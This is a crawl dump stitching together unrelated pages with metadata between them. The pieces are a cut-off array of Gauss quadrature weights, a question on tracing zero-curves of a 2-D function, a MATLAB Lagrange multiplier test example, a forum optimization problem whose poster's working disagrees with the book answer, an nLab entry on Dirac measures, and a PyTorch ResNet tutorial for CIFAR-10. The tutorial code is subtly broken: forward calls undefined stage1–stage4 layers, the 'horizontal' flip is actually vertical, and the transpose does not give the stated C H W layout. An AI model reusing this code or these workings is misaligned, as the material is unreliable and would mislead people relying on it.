.0339977794120564, .0349147564835508, .0357728593807139, .0365706411473296, .0373067565423816, .0379799643084053, .0385891292645067, .0391332242205184, #30 .0396113317090621, .0400226455325968, .040366472122844, .0406422317102947, .0408494593018285, .040987805464794, .0410570369162294, .0410570369162294, .040987805464794, .0408494593018285, #40 .0406422317102947, .040366472122844, .0400226455325968, .0396113317090621, .0391332242205184, .0385891292645067, .0379799643084053, .0373067565423816, .0365706411473296, .0357728593807139, #50 .0349147564835508, .0339977794120564, .0330234743977917, .0319934843404216, .0309095460374916, .029773487255905, .028587223650054, .0273527555318275, .026072164497986, .0247476099206597, #60 .0233813253070112, .0219756145344162, .020532847967908, .0190554584671906, .0175459372914742, .0160068299122486, .0144407317482767, .0128502838475101, .0112381685696677, .00960710541471375, #70 .00795984747723973, .00629918049732845, .00462793522803742, .00294910295364247, .00126779163408536 #75 (indexed from 0) ]), z=np.array([ -.999505948362153, #0 -.997397786355355, -.993608772723527, -.988144453359837, -.981013938975656, -.972229228520377, -.961805126758768, -.949759207710896, -.936111781934811, -.92088586125215, -.904107119545567, #10 -.885803849292083, -.866006913771982, -.844749694983342, -.822068037328975, -.7980001871612, -.77258672828181, -.74587051350361, -.717896592387704, -.688712135277641, -.658366353758143, #20 -.626910417672267, -.594397368836793, -.560882031601237, -.526420920401243, -.491072144462194, -.454895309813726, -.417951418780327, -.380302767117504, -.342012838966962, -.303146199807908, #30 -.263768387584994, -.223945802196474, -.183745593528914, -.143235548227268, -.102483975391227, -.0615595913906112, -.0205314039939986, .0205314039939986, .0615595913906112, .102483975391227, #40 .143235548227268, .183745593528914, .223945802196474, .263768387584994, .303146199807908, .342012838966962, .380302767117504, .417951418780327, .454895309813726, .491072144462194, #50 .526420920401243, .560882031601237, .594397368836793, .626910417672267, .658366353758143, .688712135277641, .717896592387704, .74587051350361, .77258672828181, .7980001871612, #60 .822068037328975, .844749694983342, .866006913771982, .885803849292083, .904107119545567, .92088586125215, .936111781934811, .949759207710896, .961805126758768, .972229228520377, #70 .981013938975656, .988144453359837, .993608772723527, .997397786355355, .999505948362153 #75 ]) ) gauss150 = Gauss( z=np.array([ -0.9998723404457334, -0.9993274305065947, -0.9983473449340834, -0.9969322929775997, -0.9950828645255290, -0.9927998590434373, -0.9900842691660192, -0.9869372772712794, -0.9833602541697529, -0.9793547582425894, -0.9749225346595943, -0.9700655145738374, -0.9647858142586956, -0.9590857341746905, -0.9529677579610971, -0.9464345513503147, -0.9394889610042837, -0.9321340132728527, -0.9243729128743136, -0.9162090414984952, -0.9076459563329236, -0.8986873885126239, -0.8893372414942055, -0.8795995893549102, -0.8694786750173527, -0.8589789084007133, -0.8481048644991847, -0.8368612813885015, -0.8252530581614230, -0.8132852527930605, -0.8009630799369827, -0.7882919086530552, -0.7752772600680049, -0.7619248049697269, -0.7482403613363824, -0.7342298918013638, -0.7198995010552305, -0.7052554331857488, -0.6903040689571928, -0.6750519230300931, -0.6595056411226444, -0.6436719971150083, -0.6275578900977726, -0.6111703413658551, -0.5945164913591590, -0.5776035965513142, -0.5604390262878617, -0.5430302595752546, -0.5253848818220803, -0.5075105815339176, -0.4894151469632753, -0.4711064627160663, -0.4525925063160997, -0.4338813447290861, -0.4149811308476706, -0.3959000999390257, -0.3766465660565522, -0.3572289184172501, -0.3376556177463400, -0.3179351925907259, -0.2980762356029071, -0.2780873997969574, -0.2579773947782034, -0.2377549829482451, -0.2174289756869712, -0.1970082295132342, -0.1765016422258567, -0.1559181490266516, -0.1352667186271445, -0.1145563493406956, -0.0937960651617229, -0.0729949118337358, -0.0521619529078925, -0.0313062657937972, -0.0104369378042598, 0.0104369378042598, 0.0313062657937972, 0.0521619529078925, 0.0729949118337358, 0.0937960651617229, 0.1145563493406956, 0.1352667186271445, 0.1559181490266516, 0.1765016422258567, 0.1970082295132342, 0.2174289756869712, 0.2377549829482451, 0.2579773947782034, 0.2780873997969574, 0.2980762356029071, 0.3179351925907259, 0.3376556177463400, 0.3572289184172501, 0.3766465660565522, 0.3959000999390257, 0.4149811308476706, 0.4338813447290861, 0.4525925063160997, 0.4711064627160663, 0.4894151469632753, 0.5075105815339176, 0.5253848818220803, 0.5430302595752546, 0.5604390262878617, 0.5776035965513142, 0.5945164913591590, 0.6111703413658551, 0.6275578900977726, 0.6436719971150083, 0.6595056411226444, 0.6750519230300931, 0.6903040689571928, 0.7052554331857488, 0.7198995010552305, 0.7342298918013638, 0.7482403613363824, 0.7619248049697269, 0.7752772600680049, 0.7882919086530552, 0.8009630799369827, 0.8132852527930605, 0.8252530581614230, 0.8368612813885015, 0.8481048644991847, 0.8589789084007133, 0.8694786750173527, 0.8795995893549102, 0.8893372414942055, 0.8986873885126239, 0.9076459563329236, 0.9162090414984952, 0.9243729128743136, 0.9321340132728527, 0.9394889610042837, 0.9464345513503147, 0.9529677579610971, 0.9590857341746905, 0.9647858142586956, 0.9700655145738374, 0.9749225346595943, 0.9793547582425894, 0.9833602541697529, 0.9869372772712794, 0.9900842691660192, 0.9927998590434373, 0.9950828645255290, 0.9969322929775997, 0.9983473449340834, 0.9993274305065947, 0.9998723404457334 ]), w=np.array([ 0.0003276086705538, 0.0007624720924706, 0.0011976474864367, 0.0016323569986067, 0.0020663664924131, 0.0024994789888943, 0.0029315036836558, 0.0033622516236779, 0.0037915348363451, 0.0042191661429919, 0.0046449591497966, 0.0050687282939456, 0.0054902889094487, 0.0059094573005900, 0.0063260508184704, 0.0067398879387430, 0.0071507883396855, 0.0075585729801782, 0.0079630641773633, 0.0083640856838475, 0.0087614627643580, 0.0091550222717888, 0.0095445927225849, 0.0099300043714212, 0.0103110892851360, 0.0106876814158841, 0.0110596166734735, 0.0114267329968529, 0.0117888704247183, 0.0121458711652067, 0.0124975796646449, 0.0128438426753249, 0.0131845093222756, 0.0135194311690004, 0.0138484622795371, 0.0141714592928592, 0.0144882814685445, 0.0147987907597169, 0.0151028518701744, 0.0154003323133401, 0.0156911024699895, 0.0159750356447283, 0.0162520081211971, 0.0165218992159766, 0.0167845913311726, 0.0170399700056559, 0.0172879239649355, 0.0175283451696437, 0.0177611288626114, 0.0179861736145128, 0.0182033813680609, 0.0184126574807331, 0.0186139107660094, 0.0188070535331042, 0.0189920016251754, 0.0191686744559934, 0.0193369950450545, 0.0194968900511231, 0.0196482898041878, 0.0197911283358190, 0.0199253434079123, 0.0200508765398072, 0.0201676730337687, 0.0202756819988200, 0.0203748563729175, 0.0204651529434560, 0.0205465323660984, 0.0206189591819181, 0.0206824018328499, 0.0207368326754401, 0.0207822279928917, 0.0208185680053983, 0.0208458368787627, 0.0208640227312962, 0.0208731176389954, 0.0208731176389954, 0.0208640227312962, 0.0208458368787627, 0.0208185680053983, 0.0207822279928917, 0.0207368326754401, 0.0206824018328499, 0.0206189591819181, 0.0205465323660984, 0.0204651529434560, 0.0203748563729175, 0.0202756819988200, 0.0201676730337687, 0.0200508765398072, 0.0199253434079123, 0.0197911283358190, 0.0196482898041878, 0.0194968900511231, 0.0193369950450545, 0.0191686744559934, 0.0189920016251754, 0.0188070535331042, 0.0186139107660094, 0.0184126574807331, 0.0182033813680609, 0.0179861736145128, 0.0177611288626114, 0.0175283451696437, 0.0172879239649355, 0.0170399700056559, 0.0167845913311726, 0.0165218992159766, 0.0162520081211971, 0.0159750356447283, 0.0156911024699895, 0.0154003323133401, 0.0151028518701744, 0.0147987907597169, 0.0144882814685445, 0.0141714592928592, 0.0138484622795371, 0.0135194311690004, 0.0131845093222756, 0.0128438426753249, 0.0124975796646449, 0.0121458711652067, 0.0117888704247183, 0.0114267329968529, 0.0110596166734735, 0.0106876814158841, 0.0103110892851360, 0.0099300043714212, 0.0095445927225849, 0.0091550222717888, 0.0087614627643580, 0.0083640856838475, 0.0079630641773633, 0.0075585729801782, 0.0071507883396855, 0.0067398879387430, 0.0063260508184704, 0.0059094573005900, 0.0054902889094487, 0.0050687282939456, 0.0046449591497966, 0.0042191661429919, 0.0037915348363451, 0.0033622516236779, 0.0029315036836558, 0.0024994789888943, 0.0020663664924131, 0.0016323569986067, 0.0011976474864367, 0.0007624720924706, 0.0003276086705538 ]) ) | 2022-12-09 07:00:00 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7137142419815063, "perplexity": 6915.6598141352215}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-49/segments/1669446711390.55/warc/CC-MAIN-20221209043931-20221209073931-00570.warc.gz"} |
https://scicomp.stackexchange.com/questions/33290/finding-curves-where-function-goes-to-zero-in-two-dimensions | # Finding curves where function goes to zero in two dimensions
Suppose $$f(x,y)$$ is a complex function of two real arguments with roots* that are not discrete points but lie in curves. (Is there are term for this characteristic?) An example is shown below: the black curves show all the points in the $$(x, y)$$ plane where $$f(x, y) = 0$$. What is the best way to find these curves numerically, within a rectangular region?
The obvious solution is to consider 1-D slices along the $$x$$- or $$y$$-axis, and use standard 1-D root-finding algorithms to find the discrete roots along these slices. These points can then be joined up appropriately to form the curves. However I wonder if there is a more efficient strategy, taking into account 2-D information.
Answers can assume some of the properties shown in the example plot. The curves do not terminate within the rectangular region, they do not intersect, and they always have a negative gradient.
*Definition of root: a point $$(x_r, y_r)$$ such that $$f(x_r, y_r) = 0$$.
• Can't you use Newton's method using a vector and the Jacobian? Aug 21 '19 at 18:16
• Isn't this equivalent to find contours for a 2D function? Aug 21 '19 at 22:40
• You might be interested in chebfun's 2D root finding capability.
– Bort
Aug 22 '19 at 9:31
This is a technique called continuation. It typically works by using Newton's method to find one root, then you take steps along the root curve by picking a nearby point as the initial guess for the next Newton step. This is usually done to solve problems of the form $$F_\lambda(x_ \lambda)=0$$ where $$\lambda$$ is some parameter, but your problem can be recast into this form.
If done correctly, this should get what you need provided that 2 root curves don't intersect each other and the root curves don't suddenly stop. An easy method to code yourself provided you have a good Newton solver is pseudo-arclength continuation that essentially tries to progress along the root curve via an estimation of the arclength along the curve, and enforces this condition by adding an extra equation to the Newton problem. In this formulation, the derivatives can be approximated by a forward difference and the "forward" values of $$u$$ and $$\lambda$$ are the unknowns for the new system. | 2021-10-26 22:39:53 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 11, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7077515125274658, "perplexity": 307.78316443025693}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-43/segments/1634323587926.9/warc/CC-MAIN-20211026200738-20211026230738-00325.warc.gz"} |
https://www.mathworks.com/help/econ/conduct-a-lagrange-multiplier-test.html | Documentation
## Conduct a Lagrange Multiplier Test
This example shows how to calculate the required inputs for conducting a Lagrange multiplier (LM) test with `lmtest`. The LM test compares the fit of a restricted model against an unrestricted model by testing whether the gradient of the loglikelihood function of the unrestricted model, evaluated at the restricted maximum likelihood estimates (MLEs), is significantly different from zero.
The required inputs for `lmtest` are the score function and an estimate of the unrestricted variance-covariance matrix evaluated at the restricted MLEs. This example compares the fit of an AR(1) model against an AR(2) model.
### Step 1. Compute the restricted MLE.
Obtain the restricted MLE by fitting an AR(1) model (with a Gaussian innovation distribution) to the given data. Assume you have presample observations (${y}_{-1}$, ${y}_{0}$) = (9.6249,9.6396).
```Y = [10.1591; 10.1675; 10.1957; 10.6558; 10.2243; 10.4429; 10.5965; 10.3848; 10.3972; 9.9478; 9.6402; 9.7761; 10.0357; 10.8202; 10.3668; 10.3980; 10.2892; 9.6310; 9.6318; 9.1378; 9.6318; 9.1378]; Y0 = [9.6249; 9.6396]; model = arima(1,0,0); fit = estimate(model,Y,'Y0',Y0);```
``` ARIMA(1,0,0) Model (Gaussian Distribution): Value StandardError TStatistic PValue _______ _____________ __________ _________ Constant 3.2999 2.4606 1.3411 0.17988 AR{1} 0.67097 0.24635 2.7237 0.0064564 Variance 0.12506 0.043015 2.9074 0.0036441 ```
When conducting an LM test, only the restricted model needs to be fit.
### Step 2. Compute the gradient matrix.
Estimate the variance-covariance matrix for the unrestricted AR(2) model using the outer product of gradients (OPG) method.
For an AR(2) model with Gaussian innovations, the contribution to the loglikelihood function at time $t$ is given by
`$\mathrm{log}{L}_{t}=-0.5\mathrm{log}\left(2\pi {\sigma }_{\epsilon }^{2}\right)-\frac{\left({y}_{t}-c-{\varphi }_{1}{y}_{t-1}-{\varphi }_{2}{y}_{t-2}{\right)}^{2}}{2{\sigma }_{\epsilon }^{2}}$`
where ${\sigma }_{\epsilon }^{2}$ is the variance of the innovation distribution.
The contribution to the gradient at time $t$ is
`$\left[\begin{array}{cccc}\frac{\partial \mathrm{log}{L}_{t}}{\partial c}& \frac{\partial \mathrm{log}{L}_{t}}{\partial {\varphi }_{1}}& \frac{\partial \mathrm{log}{L}_{t}}{\partial {\varphi }_{2}}& \frac{\partial \mathrm{log}{L}_{t}}{\partial {\sigma }_{\epsilon }^{2}}\end{array}\right],$`
where
`$\begin{array}{ccc}\frac{\partial \mathrm{log}{L}_{t}}{\partial c}& =& \frac{{y}_{t}-c-{\varphi }_{1}{y}_{t-1}-{\varphi }_{2}{y}_{t-2}}{{\sigma }_{\epsilon }^{2}}\\ \frac{\partial \mathrm{log}{L}_{t}}{\partial {\varphi }_{1}}& =& \frac{{y}_{t-1}\left({y}_{t}-c-{\varphi }_{1}{y}_{t-1}-{\varphi }_{2}{y}_{t-2}\right)}{{\sigma }_{\epsilon }^{2}}\\ \frac{\partial \mathrm{log}{L}_{t}}{\partial {\varphi }_{2}}& =& \frac{{y}_{t-2}\left({y}_{t}-c-{\varphi }_{1}{y}_{t-1}-{\varphi }_{2}{y}_{t-2}\right)}{{\sigma }_{\epsilon }^{2}}\\ \frac{\partial \mathrm{log}{L}_{t}}{\partial {\sigma }_{\epsilon }^{2}}& =& -\frac{1}{2{\sigma }_{\epsilon }^{2}}+\frac{\left({y}_{t}-c-{\varphi }_{1}{y}_{t-1}-{\varphi }_{2}{y}_{t-2}{\right)}^{2}}{2{\sigma }_{\epsilon }^{4}}\end{array}$`
Evaluate the gradient matrix, $G$, at the restricted MLEs (using ${\underset{}{\overset{ˆ}{\varphi }}}_{2}=0$ ).
```c = fit.Constant; phi1 = fit.AR{1}; phi2 = 0; sig2 = fit.Variance; Yt = Y; Yt1 = [9.6396; Y(1:end-1)]; Yt2 = [9.6249; Yt1(1:end-1)]; N = length(Y); G = zeros(N,4); G(:,1) = (Yt-c-phi1*Yt1-phi2*Yt2)/sig2; G(:,2) = Yt1.*(Yt-c-phi1*Yt1-phi2*Yt2)/sig2; G(:,3) = Yt2.*(Yt-c-phi1*Yt1-phi2*Yt2)/sig2; G(:,4) = -0.5/sig2 + 0.5*(Yt-c-phi1*Yt1-phi2*Yt2).^2/sig2^2;```
### Step 3. Estimate the variance-covariance matrix.
Compute the OPG variance-covariance matrix estimate.
`V = inv(G'*G)`
```V = 4×4 6.1431 -0.6966 0.0827 0.0367 -0.6966 0.1535 -0.0846 -0.0061 0.0827 -0.0846 0.0771 0.0024 0.0367 -0.0061 0.0024 0.0019 ```
Numerical inaccuracies can occur due to computer precision. To make the variance-covariance matrix symmetric, combine half of its value with half of its transpose.
`V = V/2 + V'/2;`
### Step 4. Calculate the score function.
Evaluate the score function (the sum of the individual contributions to the gradient).
`score = sum(G);`
### Step 5. Conduct the Lagrange multiplier test.
Conduct the Lagrange multiplier test to compare the restricted AR(1) model against the unrestricted AR(2) model. The number of restrictions (the degree of freedom) is one.
`[h,p,LMstat,crit] = lmtest(score,V,1)`
```h = logical 0 ```
```p = 0.5787 ```
```LMstat = 0.3084 ```
```crit = 3.8415 ```
The restricted AR(1) model is not rejected in favor of the AR(2) model (`h = 0`). | 2019-09-20 03:25:00 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 10, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9626597762107849, "perplexity": 1080.7310305462322}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-39/segments/1568514573827.2/warc/CC-MAIN-20190920030357-20190920052357-00347.warc.gz"} |
http://mathhelpforum.com/calculus/151661-optimization-problem.html | # Math Help - Optimization problem
1. ## Optimization problem
Three large squares of tin, each with edges 1m long, have four small, equal squares cut from their corners. All twelve resulting small squares are to be of the same size. The three large cross-shaped pieces are then folded and welded to make boxes with no tops, and the twelve small squares are used to make two small cubes. How should this be done to maximize the total volume of all five boxes?
------------------------------------------------------------
My working:
$V=2x^3+3(1-2x)^2x$
$V=2x^3+3(1+4x^2-4x)x$
$V=2x^3+3x+12x^3-12x^2$
$V=14x^3-12x^2+3x$
$\frac{dV}{dx}=0$ for maxima.
$42x^2-24x+3=0$
$14x^2-8x+1=0$
$x=0.3867$ or $x=0.1846$
------------------------------------------------------------
However, the answer given in the book is:
$0.25 m^3$ (all cubes, no open topped boxes) | 2015-11-29 01:02:07 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 10, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5124813318252563, "perplexity": 1980.3438288319912}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-48/segments/1448398454553.89/warc/CC-MAIN-20151124205414-00161-ip-10-71-132-137.ec2.internal.warc.gz"} |
https://ncatlab.org/nlab/show/Dirac+measure | # nLab Dirac measure
Contents
### Context
#### Measure and probability theory
measure theory
probability theory
# Contents
## Idea
A Dirac measure is a measure whose (unit) mass is concentrated on a single point $x$ of a space $X$.
From the point of view of probability theory, a Dirac measure can be seen as the law? of a deterministic random variable?, or more generally one which is almost surely? equal to a point $x$.
See also Dirac distribution for the analogous concept in the language of distributions.
## Definition
### For measurable spaces
Let $X$ be a measurable space. Given $x\in X$, the Dirac measure $\delta_x$ at $x$ is the measure defined by
$\delta_x(A) \;\coloneqq\; \begin{cases} 1 & x\in A \\ 0 & x\notin A \end{cases}$
for each measurable set $A\subseteq X$.
### For topological spaces
If $X$ is a topological space, the Dirac measure at $x$ can be also defined as the unique Borel measure $\delta_x$ which satisfies
$\delta_x(U) \;\coloneqq\; \begin{cases} 1 & x\in U \\ 0 & x\notin U \end{cases}$
for each open set $U\subseteq X$.
Equivalently, it is the extension to a measure of the Dirac valuations.
(…)
## Properties
• Every Dirac valuation on a topological space can be extended to a Dirac measure.
• On a topological space $X$, the support of the Dirac measure at $x\in X$ is equal to the closure of $x$. On T1 spaces, this is just the singleton $\{x\}$.
• The pushforward measure of a Dirac measure along a measurable function is again a Dirac measure. This is related to naturality of the unit map of probability and measure monads.
• Given a Dirac measure $\delta_x$ on a measurable space $X$ and any measure $\mu$ on any measurable space $Y$, the product measure? $\delta_x\otimes \mu$ is the unique coupling? of $\delta_x$ and $\mu$.
• The coupling above defines a map $X\times P Y\to P(X\times Y)$ which gives the strength of most probability and measure monads.
## Significance
• The Dirac measures (and the Dirac valuations) give the unit of all probability and measure monads.
• The probabilistic interpretation is that the Dirac measures are exactly those of deterministic? elements (or almost deterministic), i.e. which are “not truly random”.
• In terms of random variables, and somewhat conversely, a random element? of $X$ has the Dirac measure $\delta_x$ as law? if and only if it is almost surely? equal to $x$. | 2020-06-01 16:25:13 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 29, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9665538668632507, "perplexity": 332.10288903908315}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-24/segments/1590347419056.73/warc/CC-MAIN-20200601145025-20200601175025-00388.warc.gz"} |
https://blog.paperspace.com/pytorch-101-building-neural-networks/ | # PyTorch 101, Part 2: Building Your First Neural Network
In this part, we will implement a neural network to classify CIFAR-10 images. We cover implementing the neural network, data loading pipeline and a decaying learning rate schedule.
2 years ago • 13 min read
In this article, we will discuss how to use PyTorch to build custom neural network architectures, and how to configure your training loop. We will implement a ResNet to classify images from the CIFAR-10 Dataset.
Before, we begin, let me say that the purpose of this tutorial is not to achieve the best possible accuracy on the task, but to show you how to use PyTorch.
Let me also remind you that this is the Part 2 of the our tutorial series on PyTorch. Reading the first part, though not necessary for this article, is highly recommended.
You can get all the code in this post, (and other posts as well) in the Github repo here.
In this post, we will cover
1. How to build neural networks using nn.Module class
2. How to build custom data input pipelines with data augmentation using Dataset and Dataloader classes.
3. How to configure your learning rate with different learning rate schedules
4. Training a Resnet bases image classifier to classify images from the CIFAR-10 dataset.
## Prerequisites
1. Chain rule
2. Basic Understanding of Deep Learning
3. PyTorch 1.0
4. Part 1 of this tutorial
You can get all the code in this post, (and other posts as well) in the Github repo here.
## A Simple Neural Network
In this tutorial, we will be implementing a very simple neural network.
## Building the Network
The torch.nn module is the cornerstone of designing neural networks in PyTorch. This class can be used to implement a layer like a fully connected layer, a convolutional layer, a pooling layer, an activation function, and also an entire neural network by instantiating a torch.nn.Module object. (From now on, I'll refer to it as merely nn.module)
Multiple nn.Module objects can be strung together to form a bigger nn.Module object, which is how we can implement a neural network using many layers. In fact, nn.Module can be used to represent an arbitrary function f in PyTorch.
The nn.Module class has two methods that you have to override.
1. __init__ function. This function is invoked when you create an instance of the nn.Module. Here you will define the various parameters of a layer such as filters, kernel size for a convolutional layer, dropout probability for the dropout layer.
2. forward function. This is where you define how your output is computed. This function doesn't need to be explicitly called, and can be run by just calling the nn.Module instance like a function with the input as it's argument.
# Very simple layer that just multiplies the input by a number
class MyLayer(nn.Module):
def __init__(self, param):
super().__init__()
self.param = param
def forward(self, x):
return x * self.param
myLayerObject = MyLayer(5)
output = myLayerObject(torch.Tensor([5, 4, 3]) ) #calling forward inexplicitly
print(output)
Another widely used and important class is the nn.Sequential class. When initiating this class we can pass a list of nn.Module objects in a particular sequence. The object returned by nn.Sequential is itself a nn.Module object. When this object is run with an input, it sequentially runs the input through all the nn.Module object we passed to it, in the very same order as we passed them.
combinedNetwork = nn.Sequential(MyLayer(5), MyLayer(10))
output = combinedNetwork([3,4])
#equivalent to..
# out = MyLayer(5)([3,4])
# out = MyLayer(10)(out)
Let us now start implementing our classification network. We will make use of convolutional and pooling layers, as well as a custom implemented residual block.
While PyTorch provided many layers out of the box with it's torch.nn module, we will have to implement the residual block ourselves. Before implementing the neural network, we implement the ResNet Block.
class ResidualBlock(nn.Module):
def __init__(self, in_channels, out_channels, stride=1):
super(ResidualBlock, self).__init__()
# Conv Layer 1
self.conv1 = nn.Conv2d(
in_channels=in_channels, out_channels=out_channels,
)
self.bn1 = nn.BatchNorm2d(out_channels)
# Conv Layer 2
self.conv2 = nn.Conv2d(
in_channels=out_channels, out_channels=out_channels,
)
self.bn2 = nn.BatchNorm2d(out_channels)
# Shortcut connection to downsample residual
# In case the output dimensions of the residual block is not the same
# as it's input, have a convolutional layer downsample the layer
# being bought forward by approporate striding and filters
self.shortcut = nn.Sequential()
if stride != 1 or in_channels != out_channels:
self.shortcut = nn.Sequential(
nn.Conv2d(
in_channels=in_channels, out_channels=out_channels,
kernel_size=(1, 1), stride=stride, bias=False
),
nn.BatchNorm2d(out_channels)
)
def forward(self, x):
out = nn.ReLU()(self.bn1(self.conv1(x)))
out = self.bn2(self.conv2(out))
out += self.shortcut(x)
out = nn.ReLU()(out)
return out
As you see, we define the layers, or the components of our network in the __init__ function. In the forward function, how are we going to string together these components to compute the output from our input.
Now, we can define our full network.
class ResNet(nn.Module):
def __init__(self, num_classes=10):
super(ResNet, self).__init__()
# Initial input conv
self.conv1 = nn.Conv2d(
in_channels=3, out_channels=64, kernel_size=(3, 3),
)
self.bn1 = nn.BatchNorm2d(64)
# Create blocks
self.block1 = self._create_block(64, 64, stride=1)
self.block2 = self._create_block(64, 128, stride=2)
self.block3 = self._create_block(128, 256, stride=2)
self.block4 = self._create_block(256, 512, stride=2)
self.linear = nn.Linear(512, num_classes)
# A block is just two residual blocks for ResNet18
def _create_block(self, in_channels, out_channels, stride):
return nn.Sequential(
ResidualBlock(in_channels, out_channels, stride),
ResidualBlock(out_channels, out_channels, 1)
)
def forward(self, x):
# Output of one layer becomes input to the next
out = nn.ReLU()(self.bn1(self.conv1(x)))
out = self.stage1(out)
out = self.stage2(out)
out = self.stage3(out)
out = self.stage4(out)
out = nn.AvgPool2d(4)(out)
out = out.view(out.size(0), -1)
out = self.linear(out)
return out
## Input Format
Now that we have our network object, we turn our focus to the input. We come across different types of input while working with Deep Learning. Images, audio or high dimensional structural data.
The kind of data we are dealing with will dictate what input we use. Generally, in PyTorch, you will realise that batch is always the first dimension. Since we are dealing with Images here, I will describe the input format required by images.
The input format for images is [B C H W]. Where B is the batch size, C are the channels, H is the height and W is the width.
The output of our neural network is gibberish right now since we have used random weights. Let us now train our network.
Let us now load the data. We will be making the use of torch.utils.data.Dataset and torch.utils.data.Dataloader class for this.
Fire up the terminal, cd to your code directory and run the following commands.
wget http://pjreddie.com/media/files/cifar.tgz
tar xzf cifar.tgz
You might need to use curl if you're on macOS or manually download it if you're on windows.
We now read the labels of the classes present in the CIFAR dataset.
data_dir = "cifar/train/"
with open("cifar/labels.txt") as label_file:
label_mapping = dict(zip(labels, list(range(len(labels)))))
We will be reading images using PIL library. Before we write the functionality to load our data, we write a preprocessing function that does the following things.
1. Randomly horizontally the image with a probability of 0.5
2. Normalise the image with mean and standard deviation of CIFAR dataset
3. Reshape it from W H C to C H W.
def preprocess(image):
image = np.array(image)
if random.random() > 0.5:
image = image[::-1,:,:]
cifar_mean = np.array([0.4914, 0.4822, 0.4465]).reshape(1,1,-1)
cifar_std = np.array([0.2023, 0.1994, 0.2010]).reshape(1,1,-1)
image = (image - cifar_mean) / cifar_std
image = image.transpose(2,1,0)
return image
Normally, there are two classes PyTorch provides you in relation to build input pipelines to load data.
1. torch.data.utils.dataset, which we will just refer as the dataset class now.
2. torch.data.utils.dataloader , which we will just refer as the dataloader class now.
### torch.utils.data.dataset
dataset is a class that loads the data and returns a generator so that you iterate over it. It also lets you incorporate data augmentation techniques into the input Pipeline.
If you want to create a dataset object for your data, you need to overload three functions.
1. __init__ function. Here, you define things related to your dataset here. Most importantly, the location of your data. You can also define various data augmentations you want to apply.
2. __len__ function. Here, you just return the length of the dataset.
3. __getitem__ function. The function takes as an argument an index i and returns a data example. This function would be called every iteration during our training loop with a different i by the dataset object.
